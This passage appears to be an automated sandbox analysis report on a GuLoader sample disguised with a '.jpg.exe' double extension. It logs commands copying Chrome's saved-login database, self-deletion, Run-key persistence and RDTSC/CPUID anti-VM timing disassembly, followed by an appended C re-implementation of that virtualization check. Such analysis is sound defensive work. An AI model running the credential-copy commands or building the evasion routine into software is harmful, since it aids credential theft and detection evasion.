      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.992743671.000000000B830000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: CI-BL202006-10.jpg.exe, 00000007.00000002.1019042101.000000001F3F0000.00000040.00000001.sdmp, svchost.exe, 00000009.00000003.1015482799.0000000002C00000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: CI-BL202006-10.jpg.exe, svchost.exe
      Source: Binary string: svchost.pdb source: CI-BL202006-10.jpg.exe
      Source: Binary string: svchost.pdbUGP source: CI-BL202006-10.jpg.exe, 00000007.00000003.1014584683.0000000000936000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.992743671.000000000B830000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: 00000007.00000002.1015572977.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: CI-BL202006-10.jpg.exe PID: 5948, type: MEMORY
      Source: Yara match | File source: Process Memory Space: CI-BL202006-10.jpg.exe PID: 3608, type: MEMORY
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00403C53 push ebx; iretd 0_2_00403C60
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00401E39 push FFFFFFF2h; retf 0_2_00401E44
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00402CED push 8FB1657Fh; retf 0_2_00402CF5
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_004060F9 push ebx; iretd 0_2_004060FC
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00404F43 push ebx; iretd 0_2_00404F9C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00404F43 push ebx; iretd 0_2_00405008
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_0040435B push ebx; iretd 0_2_0040435C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00402364 push ebx; ret 0_2_0040236E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00404367 push es; ret 0_2_004043E3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00405125 push esp; iretd 0_2_0040512D
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00404FC8 push ebx; iretd 0_2_00405008
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_004043E4 push es; ret 0_2_004043FB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_004049EF push ebx; iretd 0_2_004049F0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00402986 push esi; retf 0_2_00402987
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_00404395 push es; ret 0_2_004043E3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 0_2_004025BF push edi; retf 0_2_004025C9
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_3_0093C7BD push 8BFFFFF7h; retf 7_3_0093C7C2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_1F46DE2D push ecx; ret 7_2_1F46DE40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009C178 push cs; ret 7_2_0009C179
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009520B push ecx; ret 7_2_0009520C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009B40D push cs; ret 7_2_0009B40E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A575 push eax; ret 7_2_0009A5C8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A5CB push eax; ret 7_2_0009A632
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A5C2 push eax; ret 7_2_0009A5C8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009A62C push eax; ret 7_2_0009A632
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Code function: 7_2_0009AF53 push ebp; ret 7_2_0009AF54
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0307DE2D push ecx; ret 9_2_0307DE40
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281520B push ecx; ret 9_2_0281520C
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281C178 push cs; ret 9_2_0281C179
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281A62C push eax; ret 9_2_0281A632
      Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0281AF53 push ebp; ret 9_2_0281AF54

      Source: C:\Windows\SysWOW64\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GLFXGZA0QZ
      Source: C:\Windows\SysWOW64\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GLFXGZA0QZ

      Hooking and other Techniques for Hiding and Protection:

      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: jpg.exe | Static PE information: CI-BL202006-10.jpg.exe
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  Code function: 0_2_001C252F
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  Code function: 7_2_0056252F
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  Evasive API call chain: GetPEB, DecisionNodes, Sleep (graph_7-42367)
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 00000000001C2532, second address 00000000001C2551, instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a mov esi, edx
    0x0000000c pushad
    0x0000000d mov eax, 00000001h
    0x00000012 cpuid
    0x00000014 bt ecx, 1Fh
    0x00000018 jc 00007F0AE4B0FF93h
    0x0000001a cld
    0x0000001b popad
    0x0000001c lfence
    0x0000001f rdtsc
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 00000000001C2551, second address 00000000001C2532, instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a sub edx, esi
    0x0000000c cmp edx, 00000000h
    0x0000000f jle 00007F0AE4C56E0Fh
    0x00000011 lfence
    0x00000014 rdtsc
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 0000000000562532, second address 0000000000562551, instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a mov esi, edx
    0x0000000c pushad
    0x0000000d mov eax, 00000001h
    0x00000012 cpuid
    0x00000014 bt ecx, 1Fh
    0x00000018 jc 00007F0AE4B0FF93h
    0x0000001a cld
    0x0000001b popad
    0x0000001c lfence
    0x0000001f rdtsc
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 0000000000562551, second address 0000000000562532, instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a sub edx, esi
    0x0000000c cmp edx, 00000000h
    0x0000000f jle 00007F0AE4C56E0Fh
    0x00000011 ret
    0x00000012 pop ecx
    0x00000013 cmp edx, 32h
    0x00000016 jl 00007F0AE4C56E36h
    0x00000018 push ecx
    0x00000019 call 00007F0AE4C56E63h
    0x0000001e lfence
    0x00000021 rdtsc
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 0000000000408354, second address 000000000040835A, instructions:
    0x00000000 rdtsc
    0x00000002 xor ecx, ecx
    0x00000004 add ecx, eax
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe  RDTSC instruction interceptor: first address 00000000004086EE, second address 00000000004086F4, instructions:
    0x00000000 rdtsc
    0x00000002 xor ecx, ecx
    0x00000004 add ecx, eax
    0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe  RDTSC instruction interceptor: first address 0000000002808354, second address 000000000280835A, instructions:
    0x00000000 rdtsc
    0x00000002 xor ecx, ecx
    0x00000004 add ecx, eax
    0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\
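The two signatures above (CPUID execution measurement at 0_2_001C252F / 7_2_0056252F, and the RDTSC interceptor traces) record the same GuLoader check: time a CPUID leaf 1 between two fenced RDTSC reads, test the hypervisor-present bit (CPUID.1:ECX[31], the bt ecx,1Fh), and compare the cycle delta with 0x32. The C program below is an added example written for this page, not code from the sample or from the sandbox, that re-implements that check for GCC/Clang on x86 so an analyst can see what the loader measures on a given box. Two things are this example's own: it assumes the small-delta path (jl after cmp edx,32h) is the "no hypervisor" path, which is the usual reading of this check but is not stated by the trace, and it combines EDX:EAX into a real 64-bit timestamp, whereas the sample's shl edx,20h on a 32-bit register is a no-op (shift counts are masked to 5 bits), so the sample actually ORs the two halves. The threshold name and the sampling loop are hypothetical.

```c
/*
 * Added example (editor's reconstruction, not the sample's code): the
 * RDTSC/CPUID timing check from the trace above. Threshold 0x32 and the
 * <= 0 retry branch come from the trace; the names and the sampling loop
 * are this example's own.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#include <x86intrin.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

/* cmp edx, 32h: a CPUID costing 50 or more cycles is taken as a VM exit. */
#define CPUID_CYCLE_THRESHOLD 0x32

enum vm_verdict { VERDICT_RETRY = -1, VERDICT_BARE_METAL = 0, VERDICT_VIRTUALIZED = 1 };

/* Decision logic mirroring the trace: jle on (t2 - t1) <= 0, then jl on delta < 0x32.
 * Assumption: the jl (small delta) path is the "no hypervisor" path. */
enum vm_verdict classify_cpuid_delta(int64_t delta)
{
    if (delta <= 0)
        return VERDICT_RETRY;          /* counter did not advance: measure again */
    if (delta < CPUID_CYCLE_THRESHOLD)
        return VERDICT_BARE_METAL;     /* CPUID was cheap: no VM exit */
    return VERDICT_VIRTUALIZED;        /* CPUID trapped to a hypervisor */
}

/* bt ecx, 1Fh after cpuid(eax=1): bit 31 of ECX is the "hypervisor present" flag. */
bool hypervisor_bit_set(uint32_t ecx_leaf1)
{
    return (ecx_leaf1 >> 31) & 1u;
}

#if HAVE_X86
/* One timed CPUID: rdtsc; lfence; cpuid(1); lfence; rdtsc, as in the trace
 * (plus one leading fence). Unlike the sample, EDX:EAX is combined into a
 * genuine 64-bit timestamp before subtracting. */
int64_t time_one_cpuid(uint32_t *ecx_out)
{
    unsigned int eax, ebx, ecx, edx;
    _mm_lfence();
    uint64_t t1 = __rdtsc();
    _mm_lfence();
    __cpuid(1, eax, ebx, ecx, edx);
    _mm_lfence();
    uint64_t t2 = __rdtsc();
    if (ecx_out)
        *ecx_out = ecx;
    return (int64_t)(t2 - t1);
}
#endif

/* Minimum of several samples, so interrupts and frequency changes do not
 * yield a false "virtualized" on bare metal. Returns -1 where RDTSC/CPUID
 * are unavailable (non-x86 build) or every sample hit the retry branch. */
int64_t min_cpuid_delta(int samples, uint32_t *ecx_out)
{
#if HAVE_X86
    int64_t best = -1;
    for (int i = 0; i < samples; i++) {
        int64_t d = time_one_cpuid(ecx_out);
        if (classify_cpuid_delta(d) == VERDICT_RETRY)
            continue;                  /* the sample's jle branch: discard and re-measure */
        if (best < 0 || d < best)
            best = d;
    }
    return best;
#else
    (void)samples; (void)ecx_out;
    return -1;
#endif
}

int main(void)
{
    uint32_t ecx = 0;
    int64_t delta = min_cpuid_delta(64, &ecx);
    if (delta < 0) {
        puts("RDTSC/CPUID not available on this build target");
        return 2;
    }
    printf("min cpuid cost: %lld cycles -> %s\n", (long long)delta,
           classify_cpuid_delta(delta) == VERDICT_VIRTUALIZED ? "virtualized" : "bare metal");
    printf("CPUID.1:ECX[31] hypervisor bit: %s\n", hypervisor_bit_set(ecx) ? "set" : "clear");
    return 0;
}
```

Running this inside a sandbox typically reports a CPUID cost in the thousands of cycles and the hypervisor bit set, which is why the sample's check fires there; sandboxes that want to survive it either hide the bit and trap RDTSC to fake a small delta, or (as the sandbox here did) intercept the instruction pair and log it as an evasion signature instead.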